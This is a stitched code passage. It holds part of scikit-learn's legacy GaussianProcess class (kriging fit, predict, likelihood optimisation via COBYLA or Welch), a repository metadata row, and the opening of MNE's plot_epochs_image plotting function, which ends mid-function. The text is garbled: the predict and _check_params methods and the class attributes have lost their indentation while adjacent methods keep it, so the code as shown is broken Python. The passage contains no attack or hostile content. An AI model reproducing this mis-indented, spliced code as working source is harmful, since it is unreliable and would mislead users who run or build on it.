theta_ : array
Specified theta OR the best set of autocorrelation parameters (the \
sought maximizer of the reduced likelihood function).
reduced_likelihood_function_value_ : array
The optimal reduced likelihood function value.
Examples
--------
>>> import numpy as np
>>> from sklearn.gaussian_process import GaussianProcess
>>> X = np.array([[1., 3., 5., 6., 7., 8.]]).T
>>> y = (X * np.sin(X)).ravel()
>>> gp = GaussianProcess(theta0=0.1, thetaL=.001, thetaU=1.)
>>> gp.fit(X, y) # doctest: +ELLIPSIS
GaussianProcess(beta0=None...
...
Notes
-----
The presentation implementation is based on a translation of the DACE
Matlab toolbox, see reference [NLNS2002]_.
References
----------
.. [NLNS2002] `H.B. Nielsen, S.N. Lophaven, H. B. Nielsen and J.
Sondergaard. DACE - A MATLAB Kriging Toolbox.` (2002)
http://imedea.uib-csic.es/master/cambioglobal/Modulo_V_cod101615/Lab/lab_maps/krigging/DACE-krigingsoft/dace/dace.pdf
.. [WBSWM1992] `W.J. Welch, R.J. Buck, J. Sacks, H.P. Wynn, T.J. Mitchell,
and M.D. Morris (1992). Screening, predicting, and computer
experiments. Technometrics, 34(1) 15--25.`
http://www.jstor.org/pss/1269548
"""
_regression_types = {
'constant': regression.constant,
'linear': regression.linear,
'quadratic': regression.quadratic}
_correlation_types = {
'absolute_exponential': correlation.absolute_exponential,
'squared_exponential': correlation.squared_exponential,
'generalized_exponential': correlation.generalized_exponential,
'cubic': correlation.cubic,
'linear': correlation.linear}
_optimizer_types = [
'fmin_cobyla',
'Welch']
    def __init__(self, regr='constant', corr='squared_exponential', beta0=None,
                 storage_mode='full', verbose=False, theta0=1e-1,
                 thetaL=None, thetaU=None, optimizer='fmin_cobyla',
                 random_start=1, normalize=True,
                 nugget=10. * MACHINE_EPSILON, random_state=None):
        # Store parameters unvalidated (scikit-learn estimator convention);
        # validation and canonicalization happen in _check_params during fit.
        self.regr = regr
        self.corr = corr
        self.beta0 = beta0
        self.storage_mode = storage_mode
        self.verbose = verbose
        self.theta0 = theta0
        self.thetaL = thetaL
        self.thetaU = thetaU
        self.normalize = normalize
        self.nugget = nugget
        self.optimizer = optimizer
        self.random_start = random_start
        self.random_state = random_state
    def fit(self, X, y):
        """
        The Gaussian Process model fitting method.

        Parameters
        ----------
        X : double array_like
            An array with shape (n_samples, n_features) with the input at which
            observations were made.

        y : double array_like
            An array with shape (n_samples, ) or shape (n_samples, n_targets)
            with the observations of the output to be predicted.

        Returns
        -------
        gp : self
            A fitted Gaussian Process model object awaiting data to perform
            predictions.
        """
        # Run input checks (canonicalizes regr/corr/theta before use)
        self._check_params()
        self.random_state = check_random_state(self.random_state)
        # Force data to 2D numpy.array
        X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
        # Remember the original y dimensionality so predict can mirror it
        self.y_ndim_ = y.ndim
        if y.ndim == 1:
            y = y[:, np.newaxis]
        # Check shapes of DOE & observations
        n_samples, n_features = X.shape
        _, n_targets = y.shape
        # Run input checks again with n_samples known (validates nugget shape)
        self._check_params(n_samples)
        # Normalize data or don't
        if self.normalize:
            X_mean = np.mean(X, axis=0)
            X_std = np.std(X, axis=0)
            y_mean = np.mean(y, axis=0)
            y_std = np.std(y, axis=0)
            # Guard against zero variance features/targets
            X_std[X_std == 0.] = 1.
            y_std[y_std == 0.] = 1.
            # center and scale X if necessary
            X = (X - X_mean) / X_std
            y = (y - y_mean) / y_std
        else:
            X_mean = np.zeros(1)
            X_std = np.ones(1)
            y_mean = np.zeros(1)
            y_std = np.ones(1)
        # Calculate matrix of distances D between samples
        D, ij = l1_cross_distances(X)
        if (np.min(np.sum(D, axis=1)) == 0.
                and self.corr != correlation.pure_nugget):
            # Duplicate inputs make the correlation matrix singular
            raise Exception("Multiple input features cannot have the same"
                            " target value.")
        # Regression matrix and parameters
        F = self.regr(X)
        n_samples_F = F.shape[0]
        if F.ndim > 1:
            p = F.shape[1]
        else:
            p = 1
        if n_samples_F != n_samples:
            raise Exception("Number of rows in F and X do not match. Most "
                            "likely something is going wrong with the "
                            "regression model.")
        if p > n_samples_F:
            raise Exception(("Ordinary least squares problem is undetermined "
                             "n_samples=%d must be greater than the "
                             "regression model size p=%d.") % (n_samples, p))
        if self.beta0 is not None:
            if self.beta0.shape[0] != p:
                raise Exception("Shapes of beta0 and F do not match.")
        # Set attributes
        self.X = X
        self.y = y
        self.D = D
        self.ij = ij
        self.F = F
        self.X_mean, self.X_std = X_mean, X_std
        self.y_mean, self.y_std = y_mean, y_std
        # Determine Gaussian Process model parameters
        if self.thetaL is not None and self.thetaU is not None:
            # Maximum Likelihood Estimation of the parameters
            if self.verbose:
                print("Performing Maximum Likelihood Estimation of the "
                      "autocorrelation parameters...")
            self.theta_, self.reduced_likelihood_function_value_, par = \
                self._arg_max_reduced_likelihood_function()
            if np.isinf(self.reduced_likelihood_function_value_):
                raise Exception("Bad parameter region. "
                                "Try increasing upper bound")
        else:
            # Given parameters
            if self.verbose:
                print("Given autocorrelation parameters. "
                      "Computing Gaussian Process model parameters...")
            self.theta_ = self.theta0
            self.reduced_likelihood_function_value_, par = \
                self.reduced_likelihood_function()
            if np.isinf(self.reduced_likelihood_function_value_):
                raise Exception("Bad point. Try increasing theta0.")
        # BLUP parameters computed as a by-product of the likelihood
        self.beta = par['beta']
        self.gamma = par['gamma']
        self.sigma2 = par['sigma2']
        self.C = par['C']
        self.Ft = par['Ft']
        self.G = par['G']
        if self.storage_mode == 'light':
            # Delete heavy data (it will be computed again if required)
            # (it is required only when MSE is wanted in self.predict)
            if self.verbose:
                print("Light storage mode specified. "
                      "Flushing autocorrelation matrix...")
            self.D = None
            self.ij = None
            self.F = None
            self.C = None
            self.Ft = None
            self.G = None
        return self
def predict(self, X, eval_MSE=False, batch_size=None):
"""
This function evaluates the Gaussian Process model at x.
Parameters
----------
X : array_like
An array with shape (n_eval, n_features) giving the point(s) at
which the prediction(s) should be made.
eval_MSE : boolean, optional
A boolean specifying whether the Mean Squared Error should be
evaluated or not.
Default assumes evalMSE = False and evaluates only the BLUP (mean
prediction).
batch_size : integer, optional
An integer giving the maximum number of points that can be
evaluated simultaneously (depending on the available memory).
Default is None so that all given points are evaluated at the same
time.
Returns
-------
y : array_like, shape (n_samples, ) or (n_samples, n_targets)
An array with shape (n_eval, ) if the Gaussian Process was trained
on an array of shape (n_samples, ) or an array with shape
(n_eval, n_targets) if the Gaussian Process was trained on an array
of shape (n_samples, n_targets) with the Best Linear Unbiased
Prediction at x.
MSE : array_like, optional (if eval_MSE == True)
An array with shape (n_eval, ) or (n_eval, n_targets) as with y,
with the Mean Squared Error at x.
"""
check_is_fitted(self, "X")
# Check input shapes
X = check_array(X)
n_eval, _ = X.shape
n_samples, n_features = self.X.shape
n_samples_y, n_targets = self.y.shape
# Run input checks
self._check_params(n_samples)
if X.shape[1] != n_features:
raise ValueError(("The number of features in X (X.shape[1] = %d) "
"should match the number of features used "
"for fit() "
"which is %d.") % (X.shape[1], n_features))
if batch_size is None:
# No memory management
# (evaluates all given points in a single batch run)
# Normalize input
X = (X - self.X_mean) / self.X_std
# Initialize output
y = np.zeros(n_eval)
if eval_MSE:
MSE = np.zeros(n_eval)
# Get pairwise componentwise L1-distances to the input training set
dx = manhattan_distances(X, Y=self.X, sum_over_features=False)
# Get regression function and correlation
f = self.regr(X)
r = self.corr(self.theta_, dx).reshape(n_eval, n_samples)
# Scaled predictor
y_ = np.dot(f, self.beta) + np.dot(r, self.gamma)
# Predictor
y = (self.y_mean + self.y_std * y_).reshape(n_eval, n_targets)
if self.y_ndim_ == 1:
y = y.ravel()
# Mean Squared Error
if eval_MSE:
C = self.C
if C is None:
# Light storage mode (need to recompute C, F, Ft and G)
if self.verbose:
print("This GaussianProcess used 'light' storage mode "
"at instantiation. Need to recompute "
"autocorrelation matrix...")
reduced_likelihood_function_value, par = \
self.reduced_likelihood_function()
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
rt = linalg.solve_triangular(self.C, r.T, lower=True)
if self.beta0 is None:
# Universal Kriging
u = linalg.solve_triangular(self.G.T,
np.dot(self.Ft.T, rt) - f.T,
lower=True)
else:
# Ordinary Kriging
u = np.zeros((n_targets, n_eval))
MSE = np.dot(self.sigma2.reshape(n_targets, 1),
(1. - (rt ** 2.).sum(axis=0)
+ (u ** 2.).sum(axis=0))[np.newaxis, :])
MSE = np.sqrt((MSE ** 2.).sum(axis=0) / n_targets)
# Mean Squared Error might be slightly negative depending on
# machine precision: force to zero!
MSE[MSE < 0.] = 0.
if self.y_ndim_ == 1:
MSE = MSE.ravel()
return y, MSE
else:
return y
else:
# Memory management
if type(batch_size) is not int or batch_size <= 0:
raise Exception("batch_size must be a positive integer")
if eval_MSE:
y, MSE = np.zeros(n_eval), np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to], MSE[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y, MSE
else:
y = np.zeros(n_eval)
for k in range(max(1, n_eval / batch_size)):
batch_from = k * batch_size
batch_to = min([(k + 1) * batch_size + 1, n_eval + 1])
y[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y
    def reduced_likelihood_function(self, theta=None):
        """
        This function determines the BLUP parameters and evaluates the reduced
        likelihood function for the given autocorrelation parameters theta.

        Maximizing this function wrt the autocorrelation parameters theta is
        equivalent to maximizing the likelihood of the assumed joint Gaussian
        distribution of the observations y evaluated onto the design of
        experiments X.

        Parameters
        ----------
        theta : array_like, optional
            An array containing the autocorrelation parameters at which the
            Gaussian Process model parameters should be determined.
            Default uses the built-in autocorrelation parameters
            (ie ``theta = self.theta_``).

        Returns
        -------
        reduced_likelihood_function_value : double
            The value of the reduced likelihood function associated to the
            given autocorrelation parameters theta.

        par : dict
            A dictionary containing the requested Gaussian Process model
            parameters:

            sigma2
                Gaussian Process variance.
            beta
                Generalized least-squares regression weights for
                Universal Kriging or given beta0 for Ordinary
                Kriging.
            gamma
                Gaussian Process weights.
            C
                Cholesky decomposition of the correlation matrix [R].
            Ft
                Solution of the linear equation system : [R] x Ft = F
            G
                QR decomposition of the matrix Ft.
        """
        check_is_fitted(self, "X")
        if theta is None:
            # Use built-in autocorrelation parameters
            theta = self.theta_
        # Initialize output: -inf signals a numerically infeasible theta
        reduced_likelihood_function_value = - np.inf
        par = {}
        # Retrieve data
        n_samples = self.X.shape[0]
        D = self.D
        ij = self.ij
        F = self.F
        if D is None:
            # Light storage mode (need to recompute D, ij and F)
            D, ij = l1_cross_distances(self.X)
            if (np.min(np.sum(D, axis=1)) == 0.
                    and self.corr != correlation.pure_nugget):
                raise Exception("Multiple X are not allowed")
            F = self.regr(self.X)
        # Set up R: symmetric correlation matrix with nugget on the diagonal
        r = self.corr(theta, D)
        R = np.eye(n_samples) * (1. + self.nugget)
        R[ij[:, 0], ij[:, 1]] = r
        R[ij[:, 1], ij[:, 0]] = r
        # Cholesky decomposition of R
        try:
            C = linalg.cholesky(R, lower=True)
        except linalg.LinAlgError:
            # R not positive definite for this theta; report infeasible
            return reduced_likelihood_function_value, par
        # Get generalized least squares solution
        Ft = linalg.solve_triangular(C, F, lower=True)
        try:
            Q, G = linalg.qr(Ft, econ=True)
        except:
            #/usr/lib/python2.6/dist-packages/scipy/linalg/decomp.py:1177:
            # DeprecationWarning: qr econ argument will be removed after scipy
            # 0.7. The economy transform will then be available through the
            # mode='economic' argument.
            Q, G = linalg.qr(Ft, mode='economic')
        # Reciprocal condition number of G guards the triangular solve below
        sv = linalg.svd(G, compute_uv=False)
        rcondG = sv[-1] / sv[0]
        if rcondG < 1e-10:
            # Check F
            sv = linalg.svd(F, compute_uv=False)
            condF = sv[0] / sv[-1]
            if condF > 1e15:
                raise Exception("F is too ill conditioned. Poor combination "
                                "of regression model and observations.")
            else:
                # Ft is too ill conditioned, get out (try different theta)
                return reduced_likelihood_function_value, par
        Yt = linalg.solve_triangular(C, self.y, lower=True)
        if self.beta0 is None:
            # Universal Kriging
            beta = linalg.solve_triangular(G, np.dot(Q.T, Yt))
        else:
            # Ordinary Kriging
            beta = np.array(self.beta0)
        rho = Yt - np.dot(Ft, beta)
        sigma2 = (rho ** 2.).sum(axis=0) / n_samples
        # The determinant of R is equal to the squared product of the diagonal
        # elements of its Cholesky decomposition C
        detR = (np.diag(C) ** (2. / n_samples)).prod()
        # Compute/Organize output
        reduced_likelihood_function_value = - sigma2.sum() * detR
        # Rescale variance back to the original (unnormalized) target scale
        par['sigma2'] = sigma2 * self.y_std ** 2.
        par['beta'] = beta
        par['gamma'] = linalg.solve_triangular(C.T, rho)
        par['C'] = C
        par['Ft'] = Ft
        par['G'] = G
        return reduced_likelihood_function_value, par
    def _arg_max_reduced_likelihood_function(self):
        """
        This function estimates the autocorrelation parameters theta as the
        maximizer of the reduced likelihood function.
        (Minimization of the opposite reduced likelihood function is used for
        convenience)

        Parameters
        ----------
        self : All parameters are stored in the Gaussian Process model object.

        Returns
        -------
        optimal_theta : array_like
            The best set of autocorrelation parameters (the sought maximizer of
            the reduced likelihood function).

        optimal_reduced_likelihood_function_value : double
            The optimal reduced likelihood function value.

        optimal_par : dict
            The BLUP parameters associated to thetaOpt.
        """
        # Initialize output
        best_optimal_theta = []
        best_optimal_rlf_value = []
        best_optimal_par = []
        if self.verbose:
            print("The chosen optimizer is: " + str(self.optimizer))
            if self.random_start > 1:
                print(str(self.random_start) + " random starts are required.")
        percent_completed = 0.
        # Force optimizer to fmin_cobyla if the model is meant to be isotropic
        if self.optimizer == 'Welch' and self.theta0.size == 1:
            self.optimizer = 'fmin_cobyla'
        if self.optimizer == 'fmin_cobyla':
            # COBYLA minimizes, so negate; optimize in log10 space so the
            # search is scale-free across orders of magnitude.
            def minus_reduced_likelihood_function(log10t):
                return - self.reduced_likelihood_function(
                    theta=10. ** log10t)[0]
            # Box bounds expressed as COBYLA inequality constraints (>= 0)
            constraints = []
            for i in range(self.theta0.size):
                constraints.append(lambda log10t, i=i:
                                   log10t[i] - np.log10(self.thetaL[0, i]))
                constraints.append(lambda log10t, i=i:
                                   np.log10(self.thetaU[0, i]) - log10t[i])
            for k in range(self.random_start):
                if k == 0:
                    # Use specified starting point as first guess
                    theta0 = self.theta0
                else:
                    # Generate a random starting point log10-uniformly
                    # distributed between bounds
                    log10theta0 = (np.log10(self.thetaL)
                                   + self.random_state.rand(*self.theta0.shape)
                                   * np.log10(self.thetaU / self.thetaL))
                    theta0 = 10. ** log10theta0
                # Run Cobyla
                try:
                    log10_optimal_theta = \
                        optimize.fmin_cobyla(minus_reduced_likelihood_function,
                                             np.log10(theta0).ravel(), constraints,
                                             iprint=0)
                except ValueError as ve:
                    print("Optimization failed. Try increasing the ``nugget``")
                    raise ve
                optimal_theta = 10. ** log10_optimal_theta
                optimal_rlf_value, optimal_par = \
                    self.reduced_likelihood_function(theta=optimal_theta)
                # Compare the new optimizer to the best previous one
                if k > 0:
                    if optimal_rlf_value > best_optimal_rlf_value:
                        best_optimal_rlf_value = optimal_rlf_value
                        best_optimal_par = optimal_par
                        best_optimal_theta = optimal_theta
                else:
                    # First start always seeds the running best
                    best_optimal_rlf_value = optimal_rlf_value
                    best_optimal_par = optimal_par
                    best_optimal_theta = optimal_theta
                if self.verbose and self.random_start > 1:
                    if (20 * k) / self.random_start > percent_completed:
                        percent_completed = (20 * k) / self.random_start
                        print("%s completed" % (5 * percent_completed))
            optimal_rlf_value = best_optimal_rlf_value
            optimal_par = best_optimal_par
            optimal_theta = best_optimal_theta
        elif self.optimizer == 'Welch':
            # Backup of the given attributes (temporarily mutated below,
            # restored before returning)
            theta0, thetaL, thetaU = self.theta0, self.thetaL, self.thetaU
            corr = self.corr
            verbose = self.verbose
            # This will iterate over fmin_cobyla optimizer
            self.optimizer = 'fmin_cobyla'
            self.verbose = False
            # Initialize under isotropy assumption
            if verbose:
                print("Initialize under isotropy assumption...")
            self.theta0 = check_array(self.theta0.min())
            self.thetaL = check_array(self.thetaL.min())
            self.thetaU = check_array(self.thetaU.max())
            theta_iso, optimal_rlf_value_iso, par_iso = \
                self._arg_max_reduced_likelihood_function()
            optimal_theta = theta_iso + np.zeros(theta0.shape)
            # Iterate over all dimensions of theta allowing for anisotropy
            if verbose:
                print("Now improving allowing for anisotropy...")
            for i in self.random_state.permutation(theta0.size):
                if verbose:
                    print("Proceeding along dimension %d..." % (i + 1))
                self.theta0 = check_array(theta_iso)
                self.thetaL = check_array(thetaL[0, i])
                self.thetaU = check_array(thetaU[0, i])
                # One-dimensional slice of corr: only component i of theta
                # varies, the others stay at the current optimum.
                def corr_cut(t, d):
                    return corr(check_array(np.hstack([optimal_theta[0][0:i],
                                                       t[0],
                                                       optimal_theta[0][(i +
                                                                         1)::]])),
                                d)
                self.corr = corr_cut
                optimal_theta[0, i], optimal_rlf_value, optimal_par = \
                    self._arg_max_reduced_likelihood_function()
            # Restore the given attributes
            self.theta0, self.thetaL, self.thetaU = theta0, thetaL, thetaU
            self.corr = corr
            self.optimizer = 'Welch'
            self.verbose = verbose
        else:
            raise NotImplementedError("This optimizer ('%s') is not "
                                      "implemented yet. Please contribute!"
                                      % self.optimizer)
        return optimal_theta, optimal_rlf_value, optimal_par
def _check_params(self, n_samples=None):
# Check regression model
if not callable(self.regr):
if self.regr in self._regression_types:
self.regr = self._regression_types[self.regr]
else:
raise ValueError("regr should be one of %s or callable, "
"%s was given."
% (self._regression_types.keys(), self.regr))
# Check regression weights if given (Ordinary Kriging)
if self.beta0 is not None:
self.beta0 = np.atleast_2d(self.beta0)
if self.beta0.shape[1] != 1:
# Force to column vector
self.beta0 = self.beta0.T
# Check correlation model
if not callable(self.corr):
if self.corr in self._correlation_types:
self.corr = self._correlation_types[self.corr]
else:
raise ValueError("corr should be one of %s or callable, "
"%s was given."
% (self._correlation_types.keys(), self.corr))
# Check storage mode
if self.storage_mode != 'full' and self.storage_mode != 'light':
raise ValueError("Storage mode should either be 'full' or "
"'light', %s was given." % self.storage_mode)
# Check correlation parameters
self.theta0 = np.atleast_2d(self.theta0)
lth = self.theta0.size
if self.thetaL is not None and self.thetaU is not None:
self.thetaL = np.atleast_2d(self.thetaL)
self.thetaU = np.atleast_2d(self.thetaU)
if self.thetaL.size != lth or self.thetaU.size != lth:
raise ValueError("theta0, thetaL and thetaU must have the "
"same length.")
if np.any(self.thetaL <= 0) or np.any(self.thetaU < self.thetaL):
raise ValueError("The bounds must satisfy O < thetaL <= "
"thetaU.")
elif self.thetaL is None and self.thetaU is None:
if np.any(self.theta0 <= 0):
raise ValueError("theta0 must be strictly positive.")
elif self.thetaL is None or self.thetaU is None:
raise ValueError("thetaL and thetaU should either be both or "
"neither specified.")
# Force verbose type to bool
self.verbose = bool(self.verbose)
# Force normalize type to bool
self.normalize = bool(self.normalize)
# Check nugget value
self.nugget = np.asarray(self.nugget)
if np.any(self.nugget) < 0.:
raise ValueError("nugget must be positive or zero.")
if (n_samples is not None
and self.nugget.shape not in [(), (n_samples,)]):
raise ValueError("nugget must be either a scalar "
"or array of length n_samples.")
# Check optimizer
if self.optimizer not in self._optimizer_types:
raise ValueError("optimizer should be one of %s"
% self._optimizer_types)
# Force random_start type to int
self.random_start = int(self.random_start)
| pratapvardhan/scikit-learn | sklearn/gaussian_process/gaussian_process.py | Python | bsd-3-clause | 34,972 | [
"Gaussian"
] | 136188d8a919a8b29e315d936900fa9eb89d7376a44ece1191ac43dd5f5a7879 |
"""Functions to plot epochs data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Jaakko Leppakangas <jaeilepp@student.jyu.fi>
# Jona Sassenhagen <jona.sassenhagen@gmail.com>
# Stefan Repplinger <stefan.repplinger@ovgu.de>
# Daniel McCloy <dan@mccloy.info>
#
# License: Simplified BSD
from collections import Counter
from copy import deepcopy
import warnings
import numpy as np
from .raw import _setup_channel_selections
from ..defaults import _handle_default
from ..utils import verbose, logger, warn, fill_doc, _check_option
from ..io.meas_info import create_info, _validate_type
from ..io.pick import (_get_channel_types, _picks_to_idx, _DATA_CH_TYPES_SPLIT,
_VALID_CHANNEL_TYPES)
from .utils import (tight_layout, _setup_vmin_vmax, plt_show, _check_cov,
_compute_scalings, DraggableColorbar, _setup_cmap,
_handle_decim, _set_title_multiple_electrodes,
_make_combine_callable, _set_window_title,
_make_event_color_dict, _get_channel_plotting_order)
@fill_doc
def plot_epochs_image(epochs, picks=None, sigma=0., vmin=None,
                      vmax=None, colorbar=True, order=None, show=True,
                      units=None, scalings=None, cmap=None, fig=None,
                      axes=None, overlay_times=None, combine=None,
                      group_by=None, evoked=True, ts_args=None, title=None,
                      clear=False):
    """Plot Event Related Potential / Fields image.

    Parameters
    ----------
    epochs : instance of Epochs
        The epochs.
    %(picks_good_data)s
        ``picks`` interacts with ``group_by`` and ``combine`` to determine the
        number of figures generated; see Notes.
    sigma : float
        The standard deviation of a Gaussian smoothing window applied along
        the epochs axis of the image. If 0, no smoothing is applied.
        Defaults to 0.
    vmin : None | float | callable
        The min value in the image (and the ER[P/F]). The unit is µV for
        EEG channels, fT for magnetometers and fT/cm for gradiometers.
        If vmin is None and multiple plots are returned, the limit is
        equalized within channel types.
        Hint: to specify the lower limit of the data, use
        ``vmin=lambda data: data.min()``.
    vmax : None | float | callable
        The max value in the image (and the ER[P/F]). The unit is µV for
        EEG channels, fT for magnetometers and fT/cm for gradiometers.
        If vmin is None and multiple plots are returned, the limit is
        equalized within channel types.
    colorbar : bool
        Display or not a colorbar.
    order : None | array of int | callable
        If not ``None``, order is used to reorder the epochs along the y-axis
        of the image. If it is an array of :class:`int`, its length should
        match the number of good epochs. If it is a callable it should accept
        two positional parameters (``times`` and ``data``, where
        ``data.shape == (len(good_epochs), len(times))``) and return an
        :class:`array <numpy.ndarray>` of indices that will sort ``data`` along
        its first axis.
    show : bool
        Show figure if True.
    units : dict | None
        The units of the channel types used for axes labels. If None,
        defaults to ``units=dict(eeg='µV', grad='fT/cm', mag='fT')``.
    scalings : dict | None
        The scalings of the channel types to be applied for plotting.
        If None, defaults to ``scalings=dict(eeg=1e6, grad=1e13, mag=1e15,
        eog=1e6)``.
    cmap : None | colormap | (colormap, bool) | 'interactive'
        Colormap. If tuple, the first value indicates the colormap to use and
        the second value is a boolean defining interactivity. In interactive
        mode the colors are adjustable by clicking and dragging the colorbar
        with left and right mouse button. Left mouse button moves the scale up
        and down and right mouse button adjusts the range. Hitting space bar
        resets the scale. Up and down arrows can be used to change the
        colormap. If 'interactive', translates to ('RdBu_r', True).
        If None, "RdBu_r" is used, unless the data is all positive, in which
        case "Reds" is used.
    fig : Figure | None
        :class:`~matplotlib.figure.Figure` instance to draw the image to.
        Figure must contain the correct number of axes for drawing the epochs
        image, the evoked response, and a colorbar (depending on values of
        ``evoked`` and ``colorbar``). If ``None`` a new figure is created.
        Defaults to ``None``.
    axes : list of Axes | dict of list of Axes | None
        List of :class:`~matplotlib.axes.Axes` objects in which to draw the
        image, evoked response, and colorbar (in that order). Length of list
        must be 1, 2, or 3 (depending on values of ``colorbar`` and ``evoked``
        parameters). If a :class:`dict`, each entry must be a list of Axes
        objects with the same constraints as above. If both ``axes`` and
        ``group_by`` are dicts, their keys must match. Providing non-``None``
        values for both ``fig`` and ``axes`` results in an error. Defaults to
        ``None``.
    overlay_times : array_like, shape (n_epochs,) | None
        Times (in seconds) at which to draw a line on the corresponding row of
        the image (e.g., a reaction time associated with each epoch). Note that
        ``overlay_times`` should be ordered to correspond with the
        :class:`~mne.Epochs` object (i.e., ``overlay_times[0]`` corresponds to
        ``epochs[0]``, etc).
    %(combine)s
        If callable, the callable must accept one positional input (data of
        shape ``(n_epochs, n_channels, n_times)``) and return an
        :class:`array <numpy.ndarray>` of shape ``(n_epochs, n_times)``. For
        example::

            combine = lambda data: np.median(data, axis=1)

        If ``combine`` is ``None``, channels are combined by computing GFP,
        unless ``group_by`` is also ``None`` and ``picks`` is a list of
        specific channels (not channel types), in which case no combining is
        performed and each channel gets its own figure. See Notes for further
        details. Defaults to ``None``.
    group_by : None | dict
        Specifies which channels are aggregated into a single figure, with
        aggregation method determined by the ``combine`` parameter. If not
        ``None``, one :class:`~matplotlib.figure.Figure` is made per dict
        entry; the dict key will be used as the figure title and the dict
        values must be lists of picks (either channel names or integer indices
        of ``epochs.ch_names``). For example::

            group_by=dict(Left_ROI=[1, 2, 3, 4], Right_ROI=[5, 6, 7, 8])

        Note that within a dict entry all channels must have the same type.
        ``group_by`` interacts with ``picks`` and ``combine`` to determine the
        number of figures generated; see Notes. Defaults to ``None``.
    evoked : bool
        Draw the ER[P/F] below the image or not.
    ts_args : None | dict
        Arguments passed to a call to `~mne.viz.plot_compare_evokeds` to style
        the evoked plot below the image. Defaults to an empty dictionary,
        meaning `~mne.viz.plot_compare_evokeds` will be called with default
        parameters.
    title : None | str
        If :class:`str`, will be plotted as figure title. Otherwise, the
        title will indicate channel(s) or channel type being plotted. Defaults
        to ``None``.
    clear : bool
        Whether to clear the axes before plotting (if ``fig`` or ``axes`` are
        provided). Defaults to ``False``.

    Returns
    -------
    figs : list of Figure
        One figure per channel, channel type, or group, depending on values of
        ``picks``, ``group_by``, and ``combine``. See Notes.

    Notes
    -----
    You can control how channels are aggregated into one figure or plotted in
    separate figures through a combination of the ``picks``, ``group_by``, and
    ``combine`` parameters. If ``group_by`` is a :class:`dict`, the result is
    one :class:`~matplotlib.figure.Figure` per dictionary key (for any valid
    values of ``picks`` and ``combine``). If ``group_by`` is ``None``, the
    number and content of the figures generated depends on the values of
    ``picks`` and ``combine``, as summarized in this table:

    .. cssclass:: table-bordered
    .. rst-class:: midvalign

    +----------+----------------------------+------------+-------------------+
    | group_by | picks                      | combine    | result            |
    +==========+============================+============+===================+
    |          | None, int, list of int,    | None,      |                   |
    | dict     | ch_name, list of ch_names, | string, or | 1 figure per      |
    |          | ch_type, list of ch_types  | callable   | dict key          |
    +----------+----------------------------+------------+-------------------+
    |          | None,                      | None,      |                   |
    |          | ch_type,                   | string, or | 1 figure per      |
    |          | list of ch_types           | callable   | ch_type           |
    | None     +----------------------------+------------+-------------------+
    |          | int,                       | None       | 1 figure per pick |
    |          | ch_name,                   +------------+-------------------+
    |          | list of int,               | string or  | 1 figure          |
    |          | list of ch_names           | callable   |                   |
    +----------+----------------------------+------------+-------------------+
    """
    from scipy.ndimage import gaussian_filter1d
    from .. import EpochsArray
    _validate_type(group_by, (dict, None), 'group_by')
    units = _handle_default('units', units)
    scalings = _handle_default('scalings', scalings)
    if set(units) != set(scalings):
        raise ValueError('Scalings and units must have the same keys.')
    # is picks a channel type (or None)?
    picks, picked_types = _picks_to_idx(epochs.info, picks, return_kind=True)
    ch_types = _get_channel_types(epochs.info, picks)
    # `combine` defaults to 'gfp' unless picks are specific channels and
    # there was no group_by passed
    combine_given = combine is not None
    if combine is None and (group_by is not None or picked_types):
        combine = 'gfp'
    # convert `combine` into callable (if None or str)
    combine_func = _make_combine_callable(combine)
    # handle ts_args (params for the evoked time series)
    ts_args = dict() if ts_args is None else ts_args
    manual_ylims = 'ylim' in ts_args
    if combine is not None:
        ts_args['show_sensors'] = False
    vlines = [0] if (epochs.times[0] < 0 < epochs.times[-1]) else []
    ts_defaults = dict(colors={'cond': 'k'}, title='', show=False,
                       truncate_yaxis=False, truncate_xaxis=False,
                       vlines=vlines, legend=False)
    ts_defaults.update(**ts_args)
    ts_args = ts_defaults.copy()
    # construct a group_by dict if one wasn't supplied
    if group_by is None:
        if picked_types:
            # one fig per ch_type
            group_by = {ch_type: picks[np.array(ch_types) == ch_type]
                        for ch_type in set(ch_types)
                        if ch_type in _DATA_CH_TYPES_SPLIT}
        elif combine is None:
            # one fig per pick
            group_by = {epochs.ch_names[pick]: [pick] for pick in picks}
        else:
            # one fig to rule them all
            ch_names = np.array(epochs.ch_names)[picks].tolist()
            key = _set_title_multiple_electrodes(None, combine, ch_names)
            group_by = {key: picks}
    else:
        group_by = deepcopy(group_by)
    # check for heterogeneous sensor type combinations / "combining" 1 channel
    for this_group, these_picks in group_by.items():
        this_ch_type = np.array(ch_types)[np.in1d(picks, these_picks)]
        if len(set(this_ch_type)) > 1:
            types = ', '.join(set(this_ch_type))
            raise ValueError('Cannot combine sensors of different types; "{}" '
                             'contains types {}.'.format(this_group, types))
        # now we know they're all the same type...
        group_by[this_group] = dict(picks=these_picks, ch_type=this_ch_type[0],
                                    title=title)
        # are they trying to combine a single channel?
        if len(these_picks) < 2 and combine_given:
            warn('Only one channel in group "{}"; cannot combine by method '
                 '"{}".'.format(this_group, combine))
    # check for compatible `fig` / `axes`; instantiate figs if needed; add
    # fig(s) and axes into group_by
    group_by = _validate_fig_and_axes(fig, axes, group_by, evoked, colorbar,
                                      clear=clear)
    # prepare images in advance to get consistent vmin/vmax.
    # At the same time, create a subsetted epochs object for each group
    data = epochs.get_data()
    vmin_vmax = {ch_type: dict(images=list(), norm=list())
                 for ch_type in set(ch_types)}
    for this_group, this_group_dict in group_by.items():
        these_picks = this_group_dict['picks']
        this_ch_type = this_group_dict['ch_type']
        this_ch_info = [epochs.info['chs'][n] for n in these_picks]
        these_ch_names = np.array(epochs.info['ch_names'])[these_picks]
        this_data = data[:, these_picks]
        # create subsetted epochs object
        this_info = create_info(sfreq=epochs.info['sfreq'],
                                ch_names=list(these_ch_names),
                                ch_types=[this_ch_type] * len(these_picks))
        with this_info._unlock():
            this_info['chs'] = this_ch_info
        this_epochs = EpochsArray(this_data, this_info, tmin=epochs.times[0])
        # apply scalings (only to image, not epochs object), combine channels
